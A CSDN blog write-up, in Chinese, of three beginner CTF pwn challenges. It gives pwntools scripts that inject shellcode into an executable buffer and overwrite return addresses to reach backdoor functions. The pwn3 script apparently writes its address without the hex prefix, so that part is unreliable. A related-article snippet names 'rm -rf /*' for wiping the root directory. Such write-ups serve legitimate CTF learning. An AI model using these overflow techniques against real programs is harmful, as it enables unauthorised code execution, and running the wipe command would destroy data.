第一周pwn的题目

最新推荐文章于 2024-07-31 18:38:45 发布
最新推荐文章于 2024-07-31 18:38:45 发布
阅读量383 收藏
点赞数 1
分类专栏: CTF-pwn 文章标签: linux 运维 pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52074678/article/details/127898148
版权

目录

1pwn

2.pwn1

3.pwn3

题目链接:

链接:https://pan.baidu.com/s/1Hgv6ABokKJzpiu44cNozaQ?pwd=eazw 
提取码:eazw 
 

1pwn

checksec pwn查看保护措施

file pwn查看文件格式

ida反编译出来查看

buf = mmap((void *)0x233000, 0x1000uLL, 7, 34, -1, 0LL);这里是将buf的数据位置写入mmap分配的位置0x233000

获取rbp到rsp的距离位0xb0-0x80为48位,再加上需要填充8位垃圾数据给寄存器,

exp就为

from pwn import *

io = process("./pwn")
context(os = 'linux',arch = 'amd64',log_level='debug')
buf = 0x233000
shellcode = asm(shellcraft.sh())
io.sendline(shellcode)  #将构造的shellcode写入buf
payload =b'a'*56+p64(buf)
io.sendline(payload)
io.interactive()

2.pwn1

checksec pwn1查看保护机制

file pwn1查看文件格式

ida分析

gdb调试

from pwn import *
context.arch = "amd64"
io = process("./pwn1")

payload = b'a'*23 + p64(0x40201B)
io.sendline(payload)
io.interactive()

后面exp打不通需要我们栈对齐后再打

最后的完整exp

from pwn import *
context.arch = "amd64"
io = process("./pwn1")
ret =0x401016
payload = b'a'*23 +p64(ret)+ p64(0x40201B)
io.sendline(payload)
io.interactive()

3.pwn3

checksec pwn3先看看保护措施

file pwn3查看文件格式

gdb pwn3 动态调试给主函数打断点(我已经ida看过了确定主函数存在栈溢出)

找到rbp距离rsp的距离

外加64位寄存器本身需要填充的8位垃圾数据,ida中有后门函数地址

可构建exp

from pwn import *
context.arch = "amd64"
io = process("./pwn3")


payload =  b'A'*40+p64(401186)
io.sendline(payload)
io.interactive()

获取flag

渗透者:'
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛" 涉及的是一个信息安全竞赛中的题目,该比赛可能是针对参赛者在网络安全领域,特别是"pwn"类问题解决能力的挑战。"pwn"在黑客术语中通常指的是攻破或...
pwn练习附件四道题含exp
11-21
个人pwn练习题目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
BUUCTF pwn wp 131 - 135
fa1c4的blog
04-27 564
rootersctf_2019_srop ciscn_2019_s_6 sctf_2019_easy_heap de1ctf_2019_weapon SWPUCTF_2019_p1KkHeap
ctf pwn 题目
m0_64195960的博客
04-11 1360
2022年3月21栈迁移 这道题是栈迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以栈溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的栈迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
pwn题目环境搭建
carol2358的博客
07-07 1755
记一下,防止自己忘了 配的时候出现了多种问题,尤其是最后一步,包括编码,无命令,折腾了一晚上,最后换操作系统,然后切换超级管理员搞定了, 前面的步骤有问题的话搜一下应该也能搜到,应该用sudo apt-get update就可以解决了吧(反正我是这样的?) 转载zhz师傅的,看的zhz师傅的博客搭的 https://tina2114.github.io/2020/03/22/docker%E7%9A%84%E6%90%AD%E5%BB%BA/#more 配置 一台新开的虚拟机/云服务器 这次用的是u1
XCTF hello_pwn题目
weixin_45643931的博客
11-14 2418
第一个题目通过EXP脚本连接上就出现了flag,懒得写WP 这个题目是XCTF的第二个题,也是我接触的第一个正式的pwn题目 直接下载附件 之后用IDA打开 打开以后,也不是很确定干啥,就直接ALT+T (搜索) 搜索CTF,flag之类的 之后就搜到了CTF的一句话 双击进去 然后按下F5 查看伪代码 而这里的if语句告诉了我们很多信息,如果XXX,就OOO双击函数进去 分析一下,应该是当…6C = 1853186401 时进入…0686()函数获得flag。 而这两个数据相差4个字节,更方便通过
记第一次解PWN题目
dizhifu3111的博客
11-03 96
# -*- coding: cp936 -*- from pwn import * g_local=False #不设置log_level为debug会导致程序的输出不显示出来 context.log_level = 'debug' if g_local: #启动程序 p = process('./club') #调试器...
做的第一道pwn
LL021101的博客
03-20 1240
做题步骤 一、使用Ubuntu,对pwn文件进行扫瞄; file语句主要用来看本文件是多少位的,是不是elf文件——ELF文件详解—初步认识_code&poetry的博客-CSDN博客_elf文件,(该链接详细介绍了elf文件的基本结构),图中显示64-bit,意思是64位的文件 checksec命令是用来查看该文件有哪些保护措施。 NX(DEP):数据执行防护 Canary(FS):栈溢出保护 RELRO(ASLR):(地址随机化) PIE(代码地址随机化)...
Pwn题目环境自动部署
MrTreebook的博客
03-30 419
Pwn题目环境自动部署1.下载地址2.pwntools_env介绍安装教程使用说明欢迎各路大神指导维护 1.下载地址 gitee 2.pwntools_env 介绍 自动部署pwn题环境 pwntools gdb ROPgadget gdb插件来自gitee,有效避免github连接不上的问题 安装教程 git clone https://gitee.com/liweijun0302/pwntools_env.git cd pwntools_env ./pwntools_env.sh 使用说明 安装
第一个PWN 栈溢出简单题
qq_41696518的博客
06-16 1111
第一个pwn 栈溢出简单题
部署ctf pwn题目的时候遇到的坑+经验总结
weixin_46521144的博客
10-14 3006
前言 还是第一次部署pwn题目,这次一共使用了两个项目一个是ctfd,另一个是ctf-xinetd。重点大概记录一下两个东西咋用。 ctfd 编辑首页部分 目录栏里面的page xinetd 部署题目 在bin目录下放好binary和flag(或者flag.txt以及其他的,用户ls之后就能看到这个文件夹的内容) 修改ctf.xinetd文件中如下图所示的部分为可执行文件名称,也就是pwn题目的binary文件 启动docker,使用的命令就是README中的 sudo docker build -
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci ...程序可以执行两次system,第一次执行的时候在sh的工作目录位于/tmp下一个随机的文件夹,用 ls -t来将最近生成的文件夹排序,后面输入文件路径时,用刚才得到的文件夹列表来尝试 nc连
【天格】战队-未解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中分享了多个未解出的题目附件,这些附件涵盖了网络安全领域的多个子领域,包括逆向工程、漏洞利用(PWN)、密码学(Crypto)以及杂项(Misc)。通过分析这些文件...
杂项题目练习bugku练习
04-05
#### 第一题: 签到题 - **解题步骤**:直接给出Flag,无需特别操作。 - **Flag**:`flag{BugKu-Sec-pwn!}` #### 第二题: 隐写术 - **解题步骤**:通过右键查看图片属性、使用UE查看文件尾部发现Unicode编码并解码。...
Linux初学基本命令
yuan20010401的博客
07-25 964
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
60个常见的 Linux 指令
yatingliu的博客
07-25 2027
常见 60 个Linux指令学习笔记
nodejs项目
最新发布
weixin_70751365的博客
07-31 895
一、基于域名配置server一、基于域名配置server1.一个配置文件一般只有一个http模块2.一个http模块可以有多个server模块3.一个server模块就是一套web项目4.一个server模块中可以有多个location就是项目中的url路由第一步mkdir/zhangmin第二部echo第三步vim第三步http{server{listen80;第四步vim/etc/hosts10curl。
二进制部署k8s集群之master节点和etcd数据库集群(上)
zx52306的博客
07-30 1139
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透者:'

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值